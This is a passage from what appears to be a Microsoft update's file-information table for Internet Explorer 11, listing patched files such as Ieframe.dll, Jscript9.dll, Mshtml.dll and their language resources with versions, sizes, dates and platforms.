3,072| 23-Nov-2019| 07:53| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,255,360| 23-Nov-2019| 07:55| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:54| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,061,312| 23-Nov-2019| 07:55| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:55| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,325,504| 23-Nov-2019| 07:56| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:56| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,019,840| 23-Nov-2019| 07:57| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:56| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,070,528| 23-Nov-2019| 07:58| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:57| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,082,304| 23-Nov-2019| 07:59| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 07:58| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,307,072| 23-Nov-2019| 07:59| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 07:59| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,170,368| 23-Nov-2019| 08:00| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:00| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,153,984| 23-Nov-2019| 08:01| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:01| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,291,712| 23-Nov-2019| 08:02| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:01| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,283,520| 23-Nov-2019| 08:03| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:02| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,051,584| 23-Nov-2019| 08:03| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:03| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,301,440| 23-Nov-2019| 08:04| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 08:04| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,093,056| 23-Nov-2019| 08:05| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:05| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,075,136| 23-Nov-2019| 08:06| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:05| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,298,880| 23-Nov-2019| 08:07| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:06| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,094,080| 23-Nov-2019| 08:08| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:07| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,316,800| 23-Nov-2019| 08:09| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 08:08| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,305,024| 23-Nov-2019| 08:09| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:09| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,278,912| 23-Nov-2019| 08:10| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:10| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,277,888| 23-Nov-2019| 08:11| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,584| 23-Nov-2019| 08:10| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,059,776| 23-Nov-2019| 08:12| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:11| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,315,264| 23-Nov-2019| 08:13| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:12| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,278,912| 23-Nov-2019| 08:13| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:13| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,324,480| 23-Nov-2019| 08:14| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:14| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,098,176| 23-Nov-2019| 08:15| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:15| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 1,890,304| 23-Nov-2019| 08:16| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:15| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 1,890,304| 23-Nov-2019| 08:17| Not applicable \nIeui.dll.mui| 11.0.9600.19572| 3,072| 23-Nov-2019| 08:16| Not applicable \nIeframe.dll| 11.0.9600.19572| 15,445,504| 19-Nov-2019| 19:36| x64 \nIeframe.ptxml| Not applicable| 24,486| 19-Nov-2019| 17:30| Not applicable \nIeui.dll| 11.0.9600.19572| 615,936| 19-Nov-2019| 20:19| x64 \nIeinstal.exe| 11.0.9600.19572| 492,032| 19-Nov-2019| 19:54| x64 \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:48| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:49| Not applicable \nInetres.adml| Not applicable| 523,798| 23-Nov-2019| 07:50| Not applicable \nInetres.adml| Not applicable| 497,168| 23-Nov-2019| 07:51| Not applicable \nInetres.adml| Not applicable| 549,601| 23-Nov-2019| 07:52| Not applicable \nInetres.adml| Not applicable| 938,813| 23-Nov-2019| 07:53| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 08:45| Not applicable \nInetres.adml| Not applicable| 541,364| 23-Nov-2019| 07:53| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:54| Not applicable \nInetres.adml| Not applicable| 523,828| 23-Nov-2019| 07:55| Not applicable \nInetres.adml| Not applicable| 573,051| 23-Nov-2019| 07:56| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:56| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 07:57| Not applicable \nInetres.adml| Not applicable| 567,797| 23-Nov-2019| 07:58| Not applicable \nInetres.adml| Not applicable| 545,645| 23-Nov-2019| 07:59| Not applicable \nInetres.adml| Not applicable| 635,718| 23-Nov-2019| 08:00| Not applicable \nInetres.adml| Not applicable| 522,947| 23-Nov-2019| 08:01| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 08:01| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 08:02| Not applicable \nInetres.adml| Not applicable| 486,171| 23-Nov-2019| 08:03| Not applicable \nInetres.adml| Not applicable| 546,070| 23-Nov-2019| 08:04| Not applicable \nInetres.adml| Not applicable| 556,258| 23-Nov-2019| 08:05| Not applicable \nInetres.adml| Not applicable| 532,548| 23-Nov-2019| 08:06| Not applicable \nInetres.adml| Not applicable| 539,045| 23-Nov-2019| 08:06| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 08:07| Not applicable \nInetres.adml| Not applicable| 799,803| 23-Nov-2019| 08:08| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 08:09| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 08:10| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 08:10| Not applicable \nInetres.adml| Not applicable| 501,599| 23-Nov-2019| 08:12| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 08:12| Not applicable \nInetres.adml| Not applicable| 518,930| 23-Nov-2019| 08:13| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 08:14| Not applicable \nInetres.adml| Not applicable| 418,138| 23-Nov-2019| 08:15| Not applicable \nInetres.adml| Not applicable| 434,747| 23-Nov-2019| 08:15| Not applicable \nInetres.adml| Not applicable| 434,747| 23-Nov-2019| 08:16| Not applicable \nInetres.admx| Not applicable| 1,675,975| 19-Nov-2019| 17:13| Not applicable \nMsspellcheckingfacility.exe| 6.3.9600.19572| 969,216| 19-Nov-2019| 20:10| x64 \nJscript9.dll.mui| 11.0.9600.19572| 29,184| 23-Nov-2019| 07:48| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:50| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 07:50| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:51| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:52| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 37,888| 23-Nov-2019| 07:52| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 08:45| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:53| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:54| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:55| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:56| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 27,648| 23-Nov-2019| 07:57| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 07:57| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:58| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,792| 23-Nov-2019| 07:59| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 23,040| 23-Nov-2019| 08:00| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 22,016| 23-Nov-2019| 08:01| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 08:01| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 08:02| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 31,232| 23-Nov-2019| 08:03| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 08:04| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 08:05| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 08:05| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 08:06| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 08:07| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 08:08| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 08:09| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,256| 23-Nov-2019| 08:10| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 08:10| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 08:11| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 08:12| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 08:13| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 08:14| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,384| 23-Nov-2019| 08:14| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,896| 23-Nov-2019| 08:15| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,896| 23-Nov-2019| 08:17| Not applicable \nJscript9.dll| 11.0.9600.19572| 5,500,928| 19-Nov-2019| 20:17| x64 \nJscript9diag.dll| 11.0.9600.19572| 814,080| 19-Nov-2019| 20:18| x64 \nJscript.dll| 5.8.9600.19572| 797,184| 19-Nov-2019| 20:18| x64 \nVbscript.dll| 5.8.9600.19573| 580,096| 21-Nov-2019| 02:16| x64 \nIexplore.exe| 11.0.9600.19572| 810,376| 23-Nov-2019| 06:57| x86 \nTdc.ocx| 11.0.9600.19572| 73,216| 19-Nov-2019| 07:36| x86 \nDxtmsft.dll| 11.0.9600.19572| 416,256| 19-Nov-2019| 07:40| x86 \nDxtrans.dll| 11.0.9600.19572| 279,040| 19-Nov-2019| 07:31| x86 \nMsfeeds.dll| 11.0.9600.19572| 696,320| 19-Nov-2019| 07:23| x86 \nMsfeeds.mof| Not applicable| 1,518| 19-Nov-2019| 05:44| Not applicable \nMshtmled.dll| 11.0.9600.19572| 76,288| 19-Nov-2019| 07:33| x86 \nMshtmlmedia.dll| 11.0.9600.19572| 1,155,072| 19-Nov-2019| 07:22| x86 \nMshtml.dll| 11.0.9600.19572| 20,290,048| 19-Nov-2019| 08:17| x86 \nMshtml.tlb| 11.0.9600.19572| 2,724,864| 19-Nov-2019| 08:11| Not applicable \nWow64_microsoft-windows-ie-htmlrendering.ptxml| Not applicable| 3,228| 19-Nov-2019| 05:37| Not applicable \nIeetwproxystub.dll| 11.0.9600.19572| 47,616| 19-Nov-2019| 07:58| x86 \nIeunatt.exe| 11.0.9600.19572| 115,712| 19-Nov-2019| 07:49| x86 \nOccache.dll| 11.0.9600.19572| 130,048| 19-Nov-2019| 07:30| x86 \nWebcheck.dll| 11.0.9600.19572| 230,400| 19-Nov-2019| 07:24| x86 \nIernonce.dll| 11.0.9600.19572| 30,720| 19-Nov-2019| 07:52| x86 \nIesetup.dll| 11.0.9600.19572| 62,464| 19-Nov-2019| 07:59| x86 \nIe9props.propdesc| Not applicable| 2,843| 23-Sep-2018| 13:32| Not applicable \nIeframe.dll| 11.0.9600.19572| 13,838,336| 19-Nov-2019| 07:20| x86 \nIeui.dll| 11.0.9600.19572| 476,160| 19-Nov-2019| 07:50| x86 \nWow64_ieframe.ptxml| Not applicable| 24,486| 19-Nov-2019| 05:37| Not applicable \nJscript9.dll| 11.0.9600.19572| 4,112,384| 19-Nov-2019| 07:26| x86 \nJscript9diag.dll| 11.0.9600.19572| 620,032| 19-Nov-2019| 07:49| x86 \nJscript.dll| 5.8.9600.19572| 662,528| 19-Nov-2019| 07:49| x86 \nVbscript.dll| 5.8.9600.19573| 496,640| 21-Nov-2019| 02:16| x86 \nUrlmon.dll| 11.0.9600.19572| 1,331,712| 19-Nov-2019| 07:01| x86 \nWebcheck.dll.mui| 11.0.9600.19572| 31,744| 23-Nov-2019| 06:59| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 36,352| 23-Nov-2019| 06:59| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:00| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:01| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 36,864| 23-Nov-2019| 07:01| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 39,424| 23-Nov-2019| 07:02| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 08:22| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 37,376| 23-Nov-2019| 07:03| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:04| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:05| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 38,400| 23-Nov-2019| 07:06| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 07:06| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:07| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 07:08| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 36,864| 23-Nov-2019| 07:09| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 25,600| 23-Nov-2019| 07:09| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 24,576| 23-Nov-2019| 07:10| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 07:11| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:12| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:13| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 36,352| 23-Nov-2019| 07:13| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 07:14| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:15| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 07:16| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 07:17| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:18| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 07:19| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:20| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:20| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 07:21| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 07:22| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:23| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 07:23| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 20,992| 23-Nov-2019| 07:24| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 21,504| 23-Nov-2019| 07:25| Not applicable \nWebcheck.dll.mui| 11.0.9600.19572| 21,504| 23-Nov-2019| 07:26| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 46,592| 23-Nov-2019| 06:58| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 06:59| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 07:00| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 07:00| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 56,320| 23-Nov-2019| 07:01| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 57,856| 23-Nov-2019| 07:02| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 08:22| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 07:03| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 07:04| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 07:05| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 55,296| 23-Nov-2019| 07:05| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 45,056| 23-Nov-2019| 07:06| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 07:08| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 07:08| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,248| 23-Nov-2019| 07:09| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 39,424| 23-Nov-2019| 07:10| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 07:11| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 07:11| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 07:12| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 07:13| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 07:14| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,760| 23-Nov-2019| 07:14| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 07:15| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 07:17| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 07:17| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 07:18| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,248| 23-Nov-2019| 07:19| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 07:20| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 07:20| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 07:21| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 07:22| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 07:23| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 07:23| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 07:24| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 07:25| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 07:26| Not applicable \nInetcpl.cpl| 11.0.9600.19572| 2,058,752| 19-Nov-2019| 07:23| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 06:58| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 06:59| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:00| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:00| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:01| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:02| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 08:22| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:03| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:04| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:05| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:06| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:06| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:07| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:08| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:09| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:09| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:11| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:11| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:12| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:13| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:13| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:14| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:15| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:16| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:17| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:18| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:18| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:19| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:20| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:21| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:22| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:23| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:23| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:25| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:25| Not applicable \nDiagnosticstap.dll.mui| 11.0.9600.19572| 10,752| 23-Nov-2019| 07:26| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 307,200| 23-Nov-2019| 06:58| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 293,888| 23-Nov-2019| 06:59| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,304| 23-Nov-2019| 07:00| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 289,280| 23-Nov-2019| 07:01| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 299,008| 23-Nov-2019| 07:01| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 303,104| 23-Nov-2019| 07:02| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 282,112| 23-Nov-2019| 08:22| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 296,960| 23-Nov-2019| 07:03| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 283,648| 23-Nov-2019| 07:04| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 291,840| 23-Nov-2019| 07:05| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 299,520| 23-Nov-2019| 07:06| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 275,968| 23-Nov-2019| 07:06| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,816| 23-Nov-2019| 07:07| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 293,376| 23-Nov-2019| 07:08| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 296,960| 23-Nov-2019| 07:09| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 258,048| 23-Nov-2019| 07:10| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 256,512| 23-Nov-2019| 07:11| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 289,280| 23-Nov-2019| 07:11| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 288,256| 23-Nov-2019| 07:12| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 285,184| 23-Nov-2019| 07:13| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 295,424| 23-Nov-2019| 07:14| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 297,472| 23-Nov-2019| 07:15| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,864| 23-Nov-2019| 07:15| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 295,424| 23-Nov-2019| 07:17| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 294,400| 23-Nov-2019| 07:17| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 294,400| 23-Nov-2019| 07:18| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,864| 23-Nov-2019| 07:19| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,816| 23-Nov-2019| 07:20| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 288,768| 23-Nov-2019| 07:20| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 286,208| 23-Nov-2019| 07:21| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 281,600| 23-Nov-2019| 07:22| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 286,720| 23-Nov-2019| 07:23| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,352| 23-Nov-2019| 07:23| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 242,176| 23-Nov-2019| 07:24| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 243,200| 23-Nov-2019| 07:25| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 243,200| 23-Nov-2019| 07:26| Not applicable \nJavascriptcollectionagent.dll| 11.0.9600.19572| 60,416| 19-Nov-2019| 07:36| x86 \nUrlmon.dll.mui| 11.0.9600.19572| 46,080| 23-Nov-2019| 06:58| Not applicable 